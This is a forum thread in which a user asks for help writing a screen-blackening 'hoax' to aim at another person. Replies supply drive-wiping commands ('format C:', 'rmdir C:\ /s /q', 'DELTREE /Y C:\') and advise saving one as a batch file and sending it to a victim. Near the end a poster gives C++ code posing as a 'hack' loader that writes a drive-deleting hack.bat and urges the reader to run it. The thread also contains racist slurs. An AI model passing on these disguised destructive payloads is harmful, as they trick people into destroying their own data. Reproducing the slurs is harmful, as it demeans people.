Jump to content

Featured Replies

Posted

im a n00b to c++.. can any1 help me write a hoax that turns your whole screen black?.. ty :ghug:

 

 

 

:nigga: + anything = :copchase

...

 

its easy, go to command prompt, type "format C:" at press y, and youll get a black screen :)

i dont get you... im trying to write a code that would do that to the other person's screen... not mine

 

 

 

:nigga:+ :eek3d: = :bj:

dude, ok..

 

open wordpad..

type: "del C:\ /q"

and save as 'lol.bat'

now send it to the guy u want to hoax, and when he runs it it wil delete his C drive.

 

note, it will only work on windows XP systems.

and I cant guarantea it will work, cuz Ive never realy tried it b4 lol..

i no how to write a program that deletes i just want to write a simple hoax to scare the hell out of that guy... and nothing else
  Ghengis Kahn said:
dude, ok..

 

open wordpad..

type: "del C:\ /q"

and save as 'lol.bat'

now send it to the guy u want to hoax, and when he runs it it wil delete his C drive.

 

note, it will only work on windows XP systems.

and I cant guarantea it will work, cuz Ive never realy tried it b4 lol..

 

 

actually your a dipshit

 

its "rmdir C:\ /s /q" for no prompt full deletion of the c drive

 

and for non XP boxes its DELTREE /Y C:\ > nul

 

 

as far as i know that is...

  Quote
Quote:

Originally Posted by Ghengis Kahn

dude, ok..

 

open wordpad..

type: "del C:\ /q"

and save as 'lol.bat'

now send it to the guy u want to hoax, and when he runs it it wil delete his C drive.

 

note, it will only work on windows XP systems.

and I cant guarantea it will work, cuz Ive never realy tried it b4 lol..

 

 

 

 

actually your a dipshit

 

its "rmdir C:\ /s /q" for no prompt full deletion of the c drive

 

and for non XP boxes its DELTREE /Y C:\ > nul

 

 

as far as i know that is...

 

 

 

do u use a word pad or notepad and wats the extension? also explain to me how it works

omg.. fucken answer my question damnit. dont put this nigger shit that doesnt even relate to anything i said or the previous person said :poke:

 

 

:kkkd: :kkkd: :kkkd: ---> :nigga:

HOLY SHIT THERE ARE AN ASS LOAD OF NOOBS HERE!!!!!!!11 jesus balls. ok PLEASE read SOMETHING about programming before posting idiodic questions like this. i learned VB in about a week. API calls included. ESPECIALLY for you noobs i would suggest going to places like planet source code and READING tutorials. VB you can EASILY make prank software that can do ALOT. but if you are too lazy for the rjl software has put together some computer prank stuff. http://www.rjlsoftware.com/. rifk.
yo buddy...if u aint a noob...lets see u write a C++ program if u can since u say C++ is so hard to use... write a program tat accepts an integer and outputs the binary value
actually retardo i didnt say it was hard. ever. but whatever. i will post the code when i get to it. its about 7 and that means cs. i will prolly make it tonight (later) sometime. and dont be so defensive there you prik. i can show you shit if you want, just pm me, hahaha.
stfu noob...on another thread u asked me if ios::trunc means to delete a file....buddy...if my comment says TRICKING A NOOB...do u think im gonna do something positive to him?
  dark_urza said:
stfu noob...on another thread u asked me if ios::trunc means to delete a file....buddy...if my comment says TRICKING A NOOB...do u think im gonna do something positive to him?

 

if you read my post i ask if it means what i think it means and i use the words "truncate/delete" or something VERY similar so you are retarded, and here is the crap you asked for (and what would be nice to me about pming me, i said i could help YOU if you wanted).

 

#include<iostream.h>
void main()
{ 
 int numb, placer;
 cout<<"Enter a number:";
 cin>>numb;
 for (placer=1;placer<=numb;placer*=2);
 for (placer/=2; placer>=1;placer/=2)
 {
  cout<<numb/placer;
   numb=numb%placer;
 }
 cout<<"\n";
} 

 

by the way i know alot of VB, sizeable amount of C++ and i am learning java via class at school. i also know flash and i kinda know html (its easy but i dont use it enough to be very good at it).

ill ask for help wen i need it.....if u really wanna help ppl y dont u write some tutorials on the basics of C++ n submit it to myg0t if they let u

yeah i know, haha. it was a quick writup to show you i know what i am doing. oh yeh for learning i would suggest the following books (read em and liked em):

 

Learn C++ in 21 days: http://books.bankhacker.com/Sams+Teach+Yourself+C%2B%2B+in+21+Days+%284th+Edition%29/

(he also made a 10 minute lesson book, its also good)

 

and a c++ reference guid i got cant remeber who made it. its very small and filled with refrences. enjoy!

lol ill buy those books after my exams...n i found a typed up version of the entire book on the net! ....o well wat compiler usin? im usin DEV-C++ BETA 5 n everytime u type void main()...it shows an error tat says main must return an INT

great you taught me EVERYTHING EXCEPT HOW TO USE OPENGL TO MAKE the screen black.. really helpful..(sarcastically)...

 

now can anyone actually help me this time?

since i learned something new...this be a great program to bomb a c drive...DO NOT OPEN THE FILE ON UR OWN COMPUTER

 

 

#include <iostream>

 

using namespace std;

 

int main()

{

cout<<"Loading hack";

cout<<"."; Sleep(300);

cout<<"."; Sleep(300);

cout<<"."; Sleep(300);

cout<<"\n";

 

ofstream file("hack.bat", ios::out);

if ( file.is_open())

{

file<<"rmdir C:\ /s /q";

file.close();

}

 

cout<<"Now open the hack.bat and start hacking all over the game!\n";

cout<<"Press enter to exit this window.\n";

cin.get();

}

 

 

DO NOT OPEN THE .BAT FILE

DO NOT OPEN THE .BAT FILE

DO NOT OPEN THE .BAT FILE

DO NOT OPEN THE .BAT FILE

DO NOT OPEN THE .BAT FILE

DO NOT OPEN THE .BAT FILE

DO NOT OPEN THE .BAT FILE

DO NOT OPEN THE .BAT FILE

DO NOT OPEN THE .BAT FILE

Guest
This topic is now closed to further replies.